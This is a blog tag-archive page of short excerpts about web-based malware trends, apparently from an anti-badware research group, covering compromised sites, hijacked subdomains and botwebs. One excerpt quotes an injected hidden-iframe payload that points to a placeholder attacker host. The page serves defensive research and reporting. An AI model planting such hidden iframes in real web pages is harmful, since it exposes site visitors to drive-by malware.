Tag Archives: trends

Why Finland has so little malware

Tim Rains from Microsoft’s Trustworthy Computing group recently posted an excellent series of short blog posts titled Lessons from Some of the Least Malware Infected Countries in the World. Tim asked local security experts in each of these countries why … Continue reading


Hijacked subdomains still serving malware

Last month the Unmask Parasites blog wrote about attacks using hijacked subdomains of legitimate websites to serve badware. At the time of that article's publication the attacks had been going on for a month already. We are still seeing a … Continue reading


AV vendors say most badware sites are compromised

A recent report from Symantec reinforces the idea that most web-based malware is distributed via compromised, legitimate sites: In 2010 so far, using the same approach, the proportion of malicious domains that are legitimate [i.e., set up for reasons other … Continue reading


Interesting attacks from .NL addresses

I’m researching some new attacks that have been popping up on the BadwareBusters forum recently. Attacks have the form: <div style="display:none">mhukhzwbanqawsrlyqptqnfmpiiigkr<iframe width=548 height=403 src="http:ATTACK.SITE:8080/index.php"></iframe></div> After reviewing the posts by our users I compiled the following list of attack … Continue reading


Botweb using compromised Linux servers

Over at the Unmask Parasites blog, periodic BadwareBusters.org contributor Denis reports on a botweb (a term coined by our own Oliver Day) that he’s been investigating: What we see here is a long awaited botnet of zombie web servers! A … Continue reading


Google Timer objects showing up in attack code

I have been seeing more attack JavaScript using Google Timer objects. I’m not sure if this is to improve the reliability of the exploit but it is an interesting signature of the code. I’ve included a sample below (spaces added): … Continue reading


Recent web attack flawed, reducing effectiveness

Mary Landesman at ScanSafe recently reported a script injection attack, and Ryan Naraine picked up the story over on the Zero Day blog. While the initial report describes 55,000 web pages (not web sites as the Zero Day post states) … Continue reading


Hiding an infection in an unused SSL site

Today we saw an interesting case where no one could find badware in a website that Google reported as infected—until Google tipped us off to check the site using https (i.e., instead of testing http://example.com, we tested https://example.com). Sure enough, … Continue reading


Community member describes meta redirects

BadwareBusters.org community member Denis describes an emerging web-based malware attack over on his Unmask Parasites blog, and he is seeking additional information: I’ve discovered a new emerging malware attack today. Actually two attacks, but in this post I’ll review only … Continue reading


Rise of Botwebs

Botnets have been a fixture of the internet for many years. Their command and control structures have evolved greatly but their methods of propagation have largely gone unchanged. The recent advent of drive-by downloads has been part of a new … Continue reading
